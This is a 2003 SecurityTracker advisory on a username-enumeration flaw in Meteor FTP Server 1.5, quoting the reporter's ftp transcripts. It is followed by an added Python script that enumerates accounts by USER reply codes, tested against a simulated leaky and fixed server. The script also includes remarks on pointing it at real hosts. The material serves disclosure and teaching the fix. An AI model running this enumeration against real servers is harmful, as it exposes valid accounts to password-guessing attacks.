Meteor FTP Server Discloses Whether a Specified Username is Valid or Not
SecurityTracker Alert ID: 1006853
CVE Reference: GENERIC-MAP-NOMATCH

Date: May 27 2003

Impact: Disclosure of user information

Exploit Included: Yes

Description: Ziv Kamir reported an information disclosure vulnerability in the Meteor FTP Server (version 1.5). A remote user can determine valid usernames on the server without knowing any password.

During a failed login attempt, the server reportedly returns a different reply depending on whether the username or the password is incorrect. If a remote user sends the USER command with a name that does not exist on the server, the server rejects it immediately with:

530 Not logged on

(the Windows ftp client then prints "Login failed."). If the remote user sends the USER command with a valid username, the server instead responds with:

331 User name okay, need password

and only rejects the login after the PASS command. Because the reply to USER alone already separates the two cases, a remote user can exploit this behavior to enumerate valid usernames on the FTP server by sending one USER command per candidate name.

The vendor has reportedly been notified (on 27/05/2003).

Impact: A remote user can determine whether a specified username exists on the FTP server.

Solution: No solution was available at the time of this entry.

Vendor URL: http://66.235.19.241/

Cause: Access control error, State error

Underlying OS: Windows (Any)

Reported By: Ziv Kamir <vulncode@yahoo.com>

Message History: None.

Source Message Contents

Date: Tue, 27 May 2003 12:08:59 -0700 (PDT)
From: Ziv Kamir <vulncode@yahoo.com>
Subject: Vulnerability in the Meteor Ftp Server.

Hi.
Any remote attacker can obtain a list of valid users from the server.
The server will act differently for a valid user and for a non-valid one.
Attached: txt file with explanation.

Attachment: Meteor-Ftp.txt

27/05/03
Ziv Kamir
---------
-------------------------------------------------------
Application: Meteor FTP Server
Web Site: http://66.235.19.241/
Versions: 1.5
Platform: Windows
Bug: Obtain a list of valid users.
Credits:
#################################
#                               #
#          Ziv Kamir            #
#                               #
#  Email : vulncode@yahoo.com   #
#                               #
#################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
===============
1) Introduction
===============
Meteor FTP is a personal FTP server designed for the Microsoft Windows 98 and Windows Millennium Edition operating systems. It is also
compatible with Windows 2000 and Windows XP.
======
2) Bug
======
Any remote attacker can obtain a list of valid users from the server.
The server will act differently for a valid user and for a non-valid one.
===========
3) The Code
===========
Not Valid User ( The Username Is Not_Valid_User )
--------------
C:\> ftp The_Ftp_Server_IP_Address
User (x.x.x.x:(none)): Not_Valid_User
530 Not logged on
Login failed.
Valid User ( The Username Is vuln )
----------
C:\> ftp The_Ftp_Server_IP_Address
User (x.x.x.x:(none)): vuln
331 User name okay, need password
Password:
======
4) Fix
======
Date of Vendor Notification: 27/05/03
Status: Waiting for an answer from the author.
===========================================================
*** The Data is for educational purpose only. ***
===========================================================
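The two transcripts above show the check done by hand with ftp.exe. The script below automates the same probe and is an added example, not code from the advisory, from Meteor FTP or from its author: the client half opens one control connection per candidate name, sends USER, and classifies the account by the reply code (331 means the account exists, 530 means it does not). The server half is a constructed simulation of the reported Meteor FTP 1.5 reply pattern, so the example runs offline; the host, port and the user list (the advisory's "vuln" plus an assumed "admin") are assumptions, not data from the page. The `leaky=False` mode is the usual fix for this class of bug, answering every USER with 331 and deciding only at PASS, and is included to show that the same probe then stops distinguishing anything.

```python
import socket
import threading

# Constructed sample data: accounts the simulated server treats as valid.
# "vuln" is the example account from the advisory; "admin" is an added assumption.
SIMULATED_VALID_USERS = {"vuln", "admin"}


def read_reply(f):
    """Read one RFC 959 reply (single- or multi-line) and return its numeric code."""
    first = f.readline().decode("ascii", "replace")
    if len(first) < 4 or not first[:3].isdigit():
        raise RuntimeError("malformed FTP reply: %r" % first)
    line = first
    if first[3] == "-":  # multi-line reply: ends with "ddd " on its own line
        while not (line.startswith(first[:3]) and line[3:4] == " "):
            line = f.readline().decode("ascii", "replace")
            if not line:
                raise RuntimeError("connection closed inside multi-line reply")
    return int(first[:3])


def user_reply_code(host, port, username, timeout=5.0):
    """Fresh control connection, USER <username>, return the reply code.
    One connection per probe keeps any per-session failure counter at zero."""
    with socket.create_connection((host, port), timeout=timeout) as s, s.makefile("rwb") as f:
        if read_reply(f) != 220:
            raise RuntimeError("unexpected greeting from %s:%d" % (host, port))
        f.write(b"USER " + username.encode("ascii") + b"\r\n")
        f.flush()
        code = read_reply(f)
        f.write(b"QUIT\r\n")
        f.flush()
    return code


def enumerate_users(host, port, candidates):
    """331 after USER -> account exists, 530 -> it does not, anything else -> None."""
    return {name: {331: True, 530: False}.get(user_reply_code(host, port, name))
            for name in candidates}


def _serve(listener, valid_users, leaky, stop):
    """Constructed simulation, one client at a time. leaky=True reproduces the
    reported Meteor FTP 1.5 behaviour; leaky=False is the usual fix (always 331
    to USER, reject only at PASS), so USER replies no longer separate the cases."""
    listener.settimeout(0.2)
    while not stop.is_set():
        try:
            conn, _ = listener.accept()
        except socket.timeout:
            continue
        except OSError:
            return
        try:
            with conn, conn.makefile("rwb") as f:
                f.write(b"220 Simulated FTP server ready\r\n")
                f.flush()
                for raw in f:
                    verb, _, arg = raw.decode("ascii", "replace").strip().partition(" ")
                    verb = verb.upper()
                    if verb == "USER":
                        if leaky and arg not in valid_users:
                            reply = b"530 Not logged on\r\n"  # the leak: rejected before PASS
                        else:
                            reply = b"331 User name okay, need password\r\n"
                    elif verb == "PASS":
                        reply = b"530 Not logged on\r\n"  # no password is ever accepted here
                    elif verb == "QUIT":
                        reply = b"221 Goodbye\r\n"
                    else:
                        reply = b"502 Command not implemented\r\n"
                    f.write(reply)
                    f.flush()
                    if verb == "QUIT":
                        break
        except OSError:
            pass  # client went away mid-session; serve the next one


def demo(leaky=True):
    """Run the simulated server on an ephemeral loopback port and probe it."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    stop = threading.Event()
    t = threading.Thread(target=_serve, args=(listener, SIMULATED_VALID_USERS, leaky, stop),
                         daemon=True)
    t.start()
    try:
        port = listener.getsockname()[1]
        return enumerate_users("127.0.0.1", port, ["vuln", "Not_Valid_User", "admin", "guest"])
    finally:
        stop.set()
        t.join()
        listener.close()


if __name__ == "__main__":
    print("leaky server :", demo(leaky=True))
    print("fixed server :", demo(leaky=False))
```

Against the leaky server the probe separates "vuln" and "admin" from the two unknown names; against the fixed server every name gets 331 and the result degenerates to "all true", which is the point of the fix. When running `enumerate_users` against a real host, expect it to be noisy (one connection per name) and check the server's lockout policy first, since a USER/QUIT pair is still a login attempt as far as most servers are concerned.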